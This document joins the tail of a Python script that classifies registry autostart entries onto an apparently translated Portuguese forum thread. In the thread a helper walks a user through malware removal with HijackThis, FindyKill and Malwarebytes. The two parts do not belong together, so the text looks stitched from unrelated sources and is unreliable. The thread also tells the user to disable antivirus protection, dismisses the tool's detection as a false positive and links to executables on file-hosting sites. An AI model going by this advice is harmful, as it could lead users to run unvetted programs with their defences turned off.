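            category, detail = classify_cmd(line)
        if category:
            findings[category].append(detail)
    return {c: sorted(set(d)) for c, d in findings.items()}


if __name__ == '__main__':
    for category, details in sorted(analyze(SAMPLE).items()):
        print(f'{category}: {", ".join(details)}')
```

The same service name written under controlset001, controlset002 and currentcontrolset is reported once, which gives a short list of services and autostart values to check on the affected machine.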

Good morning! AyrtonMaia

<@> Download HijackThis: http://www.trendsecure.com/portal/en-US/_download/HiJackThis.exe

<@> Save it to the Arquivos de programas (Program Files) folder!

<@> But don't run it yet!

<@> So that the HijackThis log comes out complete, go to Start --> Run.

<@> Type: msconfig --> Click OK.

<@> In the window that opens, select: Normal startup - Load all device drivers and services

<@> Click Apply --> OK.

<@> Restart the computer!

<@> Run HijackThis.exe --> Click: Do a system scan and save a logfile

<@> A Notepad window will open!

<@> Select and copy its contents into this topic.

<><><><><><><><><><>

<@> Download: FindyKill (http://sd-1.archive-host.com/membres/up/116615172019703188/FindyKill.exe) ( ...by Chiquitine29 )

<@> Save it to the Arquivos de Programas (Program Files) folder!

<@> Close any programs that are open.

<@> Disable the resident protection of antivirus and antispyware programs.

<@> P.S.: Antivirus detection of this tool is a false positive!

<@> Install the tool and accept all the conditions it asks for.

<@> When that is done, run the tool by double-clicking: C:\Arquivos de Programas\FindyKill\FindyKill.bat <--

<@> At the prompt, press C. --> Enter. <-- Language option!

<@> Next, press 2. ( "Eliminar los ficheros infectados" )

<@> Press Enter --> The computer will restart twice! --> Wait!

<@> When it finishes, click on an empty area of the prompt! --> Press Enter.

<@> Notepad will open with the report: C:\FindyKill.txt <-- Report!

<><><><><><><><><><>

<@> Download: Malwarebytes (http://www.besttechie.net/tools/mbam-setup.exe)

<@> Update the program!

<@> Choose the Full scan!

<@> Disable protection programs while running Malwarebytes.

<@> Send the detected items to quarantine by clicking Remove items.

<@> For more details: http://linhadefensiva.org/forum/index.php?showtopic=75554

<><><><><><><><><><>

<@> Post: mbam-log-2009-xx-xx (00-00-00).txt

Regards!


Topic Archived

Since the author did not reply for more than 30 days, the topic has been archived.

If you are the author of the topic and want it reopened, send a private message to a moderator of this area with the link to this topic and explain the reason for reopening.


Reopened at the author's request

Waiting for the log, as per rule 2

http://forum.imasters.com.br/index.php?showtopic=165906


Lately I haven't had time to get the log, but does anyone know what this virus did to my PC?

<><><><><><><><>

Hi! AyrtonMaia

<!> Without supporting reports... almost impossible! :blink:

Regards!


Topic Archived

Since the author did not reply for more than 30 days, the topic has been archived.

If you are the author of the topic and want it reopened, send a private message to a moderator of this area with the link to this topic and explain the reason for reopening.
